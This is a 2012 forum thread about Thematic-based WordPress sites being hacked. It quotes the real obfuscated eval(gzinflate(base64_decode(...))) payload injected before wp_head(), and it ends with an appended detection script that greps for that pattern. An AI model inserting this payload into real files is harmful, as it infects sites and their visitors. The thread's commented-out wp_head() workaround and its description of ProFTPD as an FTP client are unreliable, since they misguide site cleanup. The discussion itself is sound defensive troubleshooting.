September 4, 2012 at 3:08 pm #1755
So, I’ve got an issue here where a lot of sites that I’ve built using Thematic are being hacked. Different sites, different hosting companies, different everything, including plugins. The only common element that I can find is that each of them is both WordPress and Thematic.
The hack always appears in the exact same place, around line 49 of the thematic/header.php file:
/* The function wp_head() loads Thematic's stylesheet and scripts.
 * Calling wp_head() is required to provide plugins and child themes
 * the ability to insert markup within the <head> tag.
 */
#c3284d# eval(gzinflate(base64_decode("JYxLDoMwDAX3lbhD5ANglSVQepFsoshRoGka4centwfEdjQz4uPPUK9+HgsM/kVeliA7eHKru7Elo7M/eQRKyxwllbCkIJso6izg97M5pey+V53G/FE4qKWh53sxUFc9Dg=="))); #/c3284d#
wp_head(); ?>
I’ve already emailed the files to Ian and discussed it with him and I’m also continuing to examine all the hacked sites to see if there’s another way that they could have been exploited, but I figured I’d post this here in case any other Thematic users found the same issue happening to them.
To be even clearer, the hack shows up in the header.php file, in the same spot, each and every time – no other files and no other WordPress sites/themes, just the Thematic ones.
September 4, 2012 at 4:40 pm #1756
Thanks for reporting this. My guess is, since it appears *between* the comment and the function wp_head(), that the malware simply looks for the wp_head() hook and injects before that. Since that hook is required in WordPress themes, it is guaranteed to be found. And that is the reason you find it in the same spot every time. Which WordPress version and version of Thematic were the sites running?
I honestly doubt that Thematic is the culprit. A quick google finds this info about the #c3284d# malware network. Apparently it is not even specific to WordPress but infects Joomla and other CMSes as well. According to that link, the common denominator is that users have used FTP and not SSH to connect to their host. Apparently an FTP client called ProFTPD is definitely vulnerable, but it can also be a case of stolen passwords from FileZilla or another client.
Are you using the same FTP program to connect to these hosts? Are you using plain FTP and not SFTP or SSH? When you clean up, change all FTP passwords as well as the WordPress user passwords. And see if the hosts are providing secure connections for file uploads.
Of course, if it turns out to be something in Thematic, we will do everything we can to find and patch any security vulnerability. Do report back with your findings.
September 4, 2012 at 11:22 pm #1764
Well in the interim I found this little temporary solution:
Temporarily you can hold back this infection by inserting a comment line at the top of the header file, similar to /* wp_head(); wp_head(); */. This will trick the malware into inserting the code into a comment line, and should have no effect on the website. This call will be different for different content management systems, just look immediately below where the offending code keeps appearing, and put that in the comment line instead of wp_head().
I know it’s not a good fix, but what has really been messing with me is that if Google crawls the site before I become aware of the malicious code, the site ends up flagged and blocked for days and, needless to say, this does NOTHING good for the site’s reputation.
Here’s what I’m trying as a fix:
/* The function wp_head() loads Thematic's stylesheet and scripts.
 * Calling wp_head() is required to provide plugins and child themes
 * the ability to insert markup within the <head> tag.
 */
/* wp_head(); wp_head(); */
wp_head(); ?>
</head>
I figure throwing in a couple of commented-out instances of wp_head() might throw the malware off the trail of fresh, vulnerable code.
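A detection check for the injection pattern quoted in this thread, added here as an example; it is not code from the thread, from Thematic, or from WordPress. The directory layout and the sample header.php files are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not code from the thread or from Thematic. Scans a tree of
# theme files for the injection pattern quoted in the first post: the #c3284d#
# marker and the eval(gzinflate(base64_decode( chain placed before wp_head().
# The scan directory is an assumption; point it at a copy of wp-content/themes.

# Print every .php file under $1 that carries either marker; print nothing if clean.
scan_for_injection() {
    find "$1" -type f -name '*.php' -exec grep -l -F \
        -e '#c3284d#' \
        -e 'eval(gzinflate(base64_decode(' {} + 2>/dev/null
}

# Build a constructed sample tree: one clean header.php and one carrying the
# injection immediately before wp_head(), as the first post describes.
# The base64 argument is a placeholder, not the payload from the thread.
make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/clean" "$root/infected"
    printf '%s\n' '<?php' '/* wp_head() is required. */' 'wp_head(); ?>' \
        > "$root/clean/header.php"
    printf '%s\n' '<?php' '/* wp_head() is required. */' \
        '#c3284d# eval(gzinflate(base64_decode("PLACEHOLDER"))); #/c3284d#' \
        'wp_head(); ?>' > "$root/infected/header.php"
    echo "$root"
}

# Number of flagged files under $1, so the result can be checked, not just printed.
count_hits() {
    scan_for_injection "$1" | wc -l | tr -d ' '
}

# Stand-alone run against the constructed tree.
sample_root=$(make_sample_tree)
echo "Flagged files under $sample_root:"
scan_for_injection "$sample_root"
rm -rf "$sample_root"
```

Because grep -F matches the literal strings, the check also catches the same chain when it is injected into a file other than header.php, which the first post notes it never was on these sites but which is worth confirming on a cleaned host.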
The topic ‘thematic/header.php hacked on multiple sites’ is closed to new replies.